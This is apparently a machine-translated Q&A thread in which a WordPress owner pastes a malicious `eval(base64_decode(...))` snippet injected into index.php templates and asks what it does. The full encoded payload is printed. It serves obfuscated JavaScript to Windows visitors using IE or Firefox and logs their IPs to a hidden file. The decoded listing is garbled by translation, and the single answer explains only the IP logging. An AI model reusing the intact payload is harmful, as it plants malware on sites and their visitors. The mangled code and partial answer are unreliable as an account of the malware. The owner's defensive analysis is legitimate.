2012-07-19 252 views
-1

嘿家伙,所以我最近发现,我的服务器上我所有的WordPress的安装index.php模板文件注入了此代码。 <?php eval(base64_decode('JGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyRkcj0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOyR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTskZGJmPSRkci4nLycubWQ1KCRkcik7DQppZigoc3RycG9zKCR1YSwnV2luZG93cycpIT09ZmFsc2UpJiYoKHN0cnBvcygkdWEsJ01TSUUnKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsJ0ZpcmVmb3gnKSE9PWZhbHNlKSkmJihzdHJwb3MoQGZpbGVfZ2V0X2NvbnRlbnRzKCRkYmYpLCRpcCkgPT09IGZhbHNlKSl7DQoJZXJyb3JfcmVwb3J0aW5nKDApOw0KCWVjaG8oYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkRDUwY25sN01TMXdjbTkwYjNSNWNHVTdmV05oZEdOb0tHRnpaQ2w3ZUQweU8zMGdhV1lvZUNsN1puSTlJbVp5YjIxRGFHRnlJanRtUFZzd0xDMHhMRGswTERrekxESXlMREk1TERreExERXdNU3c0T0N3eE1EZ3NPVGtzT1RBc01UQXhMREV3Tml3ek5TdzVOQ3c1TVN3eE1EVXNOakFzT1Rnc09UQXNNVEF3TERreExEazVMREV3Tnl3eE1EVXNOVFVzTVRFeUxEYzBMRGcyTERrMExEWTRMRGcyTERFd01DdzVNU3d5T1N3ek1DdzRPQ3d4TURBc09URXNNVEV4TERJNExETXlMRGd4TERNM0xEZzBMRE14TERFeE1pdzBMQzB4TEMweUxEQXNPVFVzT1RFc01UQTFMRGczTERrNExEa3lMREV3TkN3eU9Td3pNaXcwT1N3eUxEQXNMVEVzTVRFMExESXpMRGt4TERrM0xERXdOaXc1TVN3eU1Td3hNVFFzTXl3dE1pd3dMQzB4TERnNUxERXdNaXc0T1N3eE1EWXNNVEF3TERreExEazVMREV3Tnl3ek5pd3hNRGdzTVRBMUxEazFMREV3TlN3NU1pd3pNQ3d5TXl3MU1TdzVOU3c1TVN3eE1EVXNPRGNzT1Rnc09USXNNaklzTVRBMExERXdOU3c0T1N3MU1Dd3pNQ3c1TkN3eE1EVXNNVEEzTERFd01pdzBOeXd6T0N3ek55dzRPU3d4TVRFc01UQXlMREV3TkN3NU55d3hNRGNzT1RNc01UQTVMRGszTERNMUxERXdNQ3d4TVRFc09URXNNVEV3TERNMkxERXdOaXd4TURZc016Y3NOVElzT1RRc01UQXhMRFV3TERReExESTVMREl4TERFeE1DdzVOU3c0T1N3eE1EY3NPVFFzTlRBc016QXNNemtzTXpjc016QXNNaklzT1RNc09USXNPVFVzT1RJc09UVXNNVEEyTERVd0xETXdMRE01TERNM0xETXdMREl5TERFd05Dd3hNRGNzTVRFeExEazNMRGt5TERVeExESTRMREV3T1N3NU5Td3hNRFFzT1RZc09EZ3NPVFFzT1Rrc09UVXNNVEExTERFeE1pdzBPQ3c1TXl3NU5pdzVNQ3c0T1N3NU1pd3hNREFzTkRnc01UQXpMREV3TVN3eE1EUXNPVFlzTVRBMkxEazBMREV3TWl3eE1EQXNORGNzT0Rnc09EZ3NNVEEwTERFd01pdzVPQ3d4TURZc01UQTNMRGt4TERRNExEazVMRGt4TERreExERXdOeXcwT0N3ek55dzFNQ3d4TURZc01UQXdMREV3TXl3ME9Dd3pOeXcxTUN3eU9TdzFNU3cxTVN3ek55dzVOQ3c1TXl3eE1EUXNPRFlzTVRBd0xEa3hMRFV4TERJMUxETXhMRFE0TERRc0xURXNMVElzTVRFMkxETXNMVElzTUN3NU1pd3hNRFlzTVRBeExEZzVMREV3TlN3NU5pd3hNREVzT1Rrc01qTXNPVFVzT1RFc01UQTFMRGczTERrNExEa3lMREV3TkN3eU9Td3pNaXd4TVRNc01pd3dMQzB4TEMweUxERXdPU3c0Tnl3eE1ETXNNak1zT1RJc01qRXNOVElzTWpJc09Ea3NNVEF5TERnNUxERXdOaXd4TURBc09URXNPVGtzTVRBM0xETTJMRGc0TERFd05TdzVNU3c0Tml3eE1EY3NPVEVzTlRnc09Ua3NPVEVzT1Rnc09USXNNVEF3TERFd05Td3pNU3d5T1N3NU5DdzVNeXd4TURRc09EWXNNVEF3TERreExESTRMRE15TERRNUxEa3hMRE0zTERFd05TdzVNQ3d4TURjc05UVXNNVEExTERFd055d3hNRFFzT1RRc09Ea3NNVEEzTERFd05TdzVNaXd6TUN3eU9Dd3hNRFlzTVRBMExEZzRMRE13TERNMExESTRMRGsxTERFd05pd3hNRFVzTVRBekxEUTRMRE0yTERNNExEa3dMREV3T1N3eE1ETXNNVEExTERrMUxERXdPQ3c1TkN3eE1EY3NPVGdzTXpZc09UZ3NNVEV5TERreUxERXdPQ3d6Tnl3eE1EY3NNVEEwTERNNExEVXpMRGt5TERFd01pdzFNU3d6T1N3ek1Dd3pNU3cwT0N3NU15d3pOaXd4TURRc01UQTNMREV4TVN3NU55dzVNaXd6Tml3eE1EY3NPVFlzTVRBMUxEazBMRGc1TERrMUxEazNMRGsyTERFd05pd3hNVEFzTlRJc01qa3NPVE1zT1RZc09UQXNPRGtzT1RJc01UQXdMREk0TERVd0xEa3lMRE0xTERFd05pd3hNRFlzTVRFd0xEazVMRGt4TERNMUxERXdNeXd4TURFc01UQTBMRGsyTERFd05pdzVOQ3d4TURJc01UQXdMRFV3TERNd0xEZzNMRGczTERFd05pd3hNREVzT1Rjc01UQTRMREV3Tml3NU1Dd3pNQ3cwT1N3NU1Td3pOeXd4TURVc01UQTFMREV4TWl3NU9DdzVNQ3d6Tnl3NU9DdzVNQ3c1TXl3eE1EWXNOVEFzTXpBc016Z3NNamdzTlRBc09USXNNelVzTVRBMkxERXdOaXd4TVRBc09Ua3NPVEVzTXpVc01UQTNMREV3TVN3eE1ERXNOVElzTWprc016Y3NNekFzTkRrc09URXNNemNzTVRBMUxEa3dMREV3Tnl3MU5Td3hNRFVzTVRBM0xERXdOQ3c1TkN3NE9Td3hNRGNzTVRBMUxEa3lMRE13TERJNExERXhNQ3c1TlN3NE9Td3hNRGNzT1RRc01qZ3NNelVzTWprc016Z3NNemtzTWprc016QXNOVEFzT1RJc016VXNNVEEyTERreExERXdOU3cxTml3eE1EWXNNVEExTERFd05TdzVOU3c0Tnl3eE1EZ3NNVEEyTERrd0xETXhMREk1TERrekxEa3lMRGsxTERreUxEazFMREV3Tml3eU9Dd3pOU3d5T1N3ek9Dd3pPU3d5T1N3ek1DdzFNQ3d6TEMweUxEQXNMVEVzT0Rrc01UQXlMRGc1TERFd05pd3hNREFzT1RFc09Ua3NNVEEzTERNMkxEa3lMRGt5TERFd05pdzFPQ3c1T1N3NU1TdzVPQ3c1TWl3eE1EQXNNVEExTERFd05pdzFOaXd4TVRBc056VXNPRGNzT1RJc05qa3NPRGNzT1Rnc09USXNNekFzTWpnc09Ea3NNVEF4TERnNUxERXhNaXd5T1N3ek1DdzRNaXd6T0N3NE1pd3pOeXc0Tnl3eE1ERXNNVEF6TERreExEazVMRGt4TERVM0xEa3pMRGsyTERrNExEZzVMRE14TERreUxETXdMRFV3TERNc0xUSXNNQ3d4TVRWZE8zWTlJbVYyWVNJN2ZXbG1LSFlwWlQxM2FXNWtiM2RiZGlzaWJDSmRPM2M5Wmp0elBWdGRPM0k5VTNSeWFXNW5PM285S0NobEtUOGlRMjlrWlNJNklpSXBPM3A0UFdaeUszbzdabTl5S0drOU1EczFOamt0TlNzMUxXaytNRHRwS3oweEtYdHFQV2s3YVdZb1pTbHpQWE1yY2x0NmVGMG9LSGRiYWwwcU1Tc29PU3RsS0NKcUpUTWlLU2twS1R0OUlHbG1LSGdtSm1ZbUpqQXhNajA5UFRFd0tXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KCWlmICgkZnAgPSBAZm9wZW4oJGRiZiAsICJhIikpe2ZwdXRzKCRmcCAsICRpcC4nfCcpOyBmY2xvc2UoJGZwKTt9DQp9'));?>Wordpress恶意软件注入index.php模板

通常它是非常简单,我把它通过一个base64解码,但我认为他们已经再次编码它。

我从BASE64解码得到的是

$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr); 

IF((strpos($ UA, '视窗')!== FALSE)& &((strpos($ UA, 'MSIE')!= != FALSE)||(strpos($ UA, '火狐')== FALSE))& &(strpos(@file_get_contents($ DBF),$ IP)=== FALSE)){ 的error_reporting(0);

尝试{1-原型;}赶上(ASD){X = 2;}如果(x)的{FR = “fromChar”; F = [0,-1,94,93,22,29,91,101,88,108 ,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37 ,84,31,112,4,-1,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,114,3, -2,0,-1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,51,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47, 38,37,89,111,102,104,97,107,93,109,97,35,100,111,91,110,36,106,106,37,52,94,101,50,41,29,21,110,95,89,107,94,50,30,39,37,30,22, 93,92,95,92,95,106,50,30,39,37,30,22,104,107,111,97,92,51,28,109,95,104,96,88,94,99,95,105,112,48,93,96,90, 89,92,100,48,103,101,104,96,106,94,102,100,47,88,88,104,102,98,106,107,91,48,99,91,91,107,48,37,50,106,100,103,48,37,50,29,51,51,37,94, 93,104,86,100,91,51,25,31,48,4,-1,-2,116,3,-2,0,92,106,101,89,105,96,101,99,23,95,91,105,87,98,92,104,29 ,32,113,2,0,-1,-2 ,109,87,103,23,92,21,52,22,89,102,89,106,100,91,99,107,36,88,105,91,86,107,91,58,99,91,98,92,100,105,31,29,94,93,104 ,86,100,91,28,32,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,106,104,88,30,34,28,95,106,105,103,48,36,38,90,109,103,105,95,108,94,107 ,98,36,98,112,92,108,37,107,104,38,53,92,102,51,39,30,31,48,93,36,104,107,111,97,92,36,107,96,105,94,89,95,97,96,106,110,52 ,29,93,96,90,89,92,100,28,50,92,35,106,106,110,99,91,35,103,101,104,96,106,94,102,100,50,30,87,87,106,101,97,108,106,90,30,49,91,37,105,105,112 ,98,90,37,98,90,93,106,50,30,38,28,50,92,35,106,106,110,99,91,35,107,101,101,52,29,37,30,49,91,37,105,90,107,55,105,107,104 ,94,89,107,105,92,30,28,110,95,89,107,94,28,35,29,38,39,29,30,50,92,35,106,91,105,56,106,105,105,95,87,108,106,90,31,29 ,93,92,95,92,95,106,28,35,29,38,39,29,30,50,3,-2,0,-1,89,102,89,106,100,91,99,107,36,92,92,106 ,58,99,91,98,92,100,105,106,56,110,75,87,92,69,87,98,92,30,28,89,101,89,112,29,30,82,38,82,37,87,101,103,91 ,99,91,57,93,96,98,89,31,92, 30,50,3,-2,0,115]; V = “EVA”;}如果(V)E =窗口[V + “L”]; W = F; S = []; R =字符串; Z =(( ΔE) “代码”: “”); ZX = FR + Z;对于(I = 0; 569-5 + 5-I> 0; I + = 1){J =;若(E)S = S +如果(x && f && 012 === 10)e(s); r [zx]((w [j] * 1 +(9 + e(“j%3”))));
if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);} 

}

可能你们帮我揣摩什么恶意软件试图做

感谢

回答

0

的问题是什么呢代码做。从我可以破译:

它创建一个具有md5'd名字写在你的文档根目录的文件。在该文件中,它将使用Internet Explorer或Firefox从Windows机器上获取每个访问者的IP。

我不知道黑客是什么之后,但如果他能得到这些代码在你的文件也许他可以访问你的FTP,从而获得新创建的日志文件。

相关问题